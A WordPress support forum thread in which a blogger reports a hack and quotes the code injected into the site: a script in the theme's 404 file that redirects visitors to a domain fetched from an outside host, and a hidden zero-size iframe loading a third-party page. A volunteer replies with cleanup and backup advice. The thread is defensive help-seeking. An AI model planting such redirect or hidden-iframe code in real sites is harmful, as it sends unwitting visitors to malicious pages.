Title: Multiple WordPress blogs hacked
Last modified: August 19, 2016

---

# Multiple WordPress blogs hacked

 *  [mousewrites](https://wordpress.org/support/users/mousewrites/)
 * (@mousewrites)
 * [16 years, 7 months ago](https://wordpress.org/support/topic/multiple-wordpress-blogs-hacked/)
 * Hey, all.
 * My site was hacked at 6 am this morning. I noticed a few other people (asking
   questions here), and it looks like they have the same problem.
 * If you look in the 404 file, you’ll find this
 * `<script>location='http://scan.<?php echo file_get_contents('http://borntobebest.
   biz/actual_domain.txt'); ?>/vista1/6/48017/';</script><?php get_header(); ?>`
 * As well as this in ALL of the index.php files (this i’m not 100% sure is hack
   related)
 *     ```
       <div id="content">
       	<div id="main">
       		<div class="content"><div class="cont-r"><div class="cont-l"><div class="cont-bot">
       			<div class="grad-hack"><div class="begin"></div>
       ```
   
 * and
 * `<iframe src="http://davtraff.com/lib/index.php" width=0 height=0 style="hidden"
   frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>`
 * My question is this: how the hell do I undo this? Do I need to scrub the PHP 
   manually? I’m not even sure how to DO that. Can I just open them in notepad and
   take out the code?
 * Yes, I’ve updated everything and changed all passwords, looked for weird plugins/
   widgets, and removed users. I’m afraid that the thing has wormed it’s way in,
   though.
 * I’ve put up at temp plain HTML file for now at steampunkwallpaper.com, just so
   nobody gets whatever the hack is pushing.
 * Help?

Viewing 3 replies - 1 through 3 (of 3 total)

 *  [iridiax](https://wordpress.org/support/users/iridiax/)
 * (@iridiax)
 * [16 years, 7 months ago](https://wordpress.org/support/topic/multiple-wordpress-blogs-hacked/#post-1264549)
 * See:
 * [http://codex.wordpress.org/FAQ_My_site_was_hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked)
   
   [http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/](http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/)
 * Because it’s multiple sites, scan your home computer for malware (some steal 
   your FTP passwords) and also contact your web host (since it may be their shared
   server that was hacked).
 *  Thread Starter [mousewrites](https://wordpress.org/support/users/mousewrites/)
 * (@mousewrites)
 * [16 years, 7 months ago](https://wordpress.org/support/topic/multiple-wordpress-blogs-hacked/#post-1264553)
 * Oh, it’s multiple people’s sites, not just mine. I saw a few other users reporting
   the same issue here today (showing the code in the 404, I mean.)
 * Thank you for the links, I will work on it. I’m assuming from reading this that
   the best thing to do is to rip it all out and redo it, vs editing the PHP, correct?
 *  [iridiax](https://wordpress.org/support/users/iridiax/)
 * (@iridiax)
 * [16 years, 7 months ago](https://wordpress.org/support/topic/multiple-wordpress-blogs-hacked/#post-1264560)
 * > the best thing to do is to rip it all out and redo it, vs editing the PHP, 
   > correct?
 * Yes, just make sure that you have backed up your own files and any customized
   WordPress files. This way, you’ll only have to check these few files.
 * [http://codex.wordpress.org/Upgrading_WordPress_Extended](http://codex.wordpress.org/Upgrading_WordPress_Extended)(
   see step 7)
    [http://codex.wordpress.org/WordPress_Backups](http://codex.wordpress.org/WordPress_Backups)
   [http://codex.wordpress.org/Backing_Up_Your_Database](http://codex.wordpress.org/Backing_Up_Your_Database)

Viewing 3 replies - 1 through 3 (of 3 total)

The topic ‘Multiple WordPress blogs hacked’ is closed to new replies.

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 3 replies
 * 2 participants
 * Last reply from: [iridiax](https://wordpress.org/support/users/iridiax/)
 * Last activity: [16 years, 7 months ago](https://wordpress.org/support/topic/multiple-wordpress-blogs-hacked/#post-1264560)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics
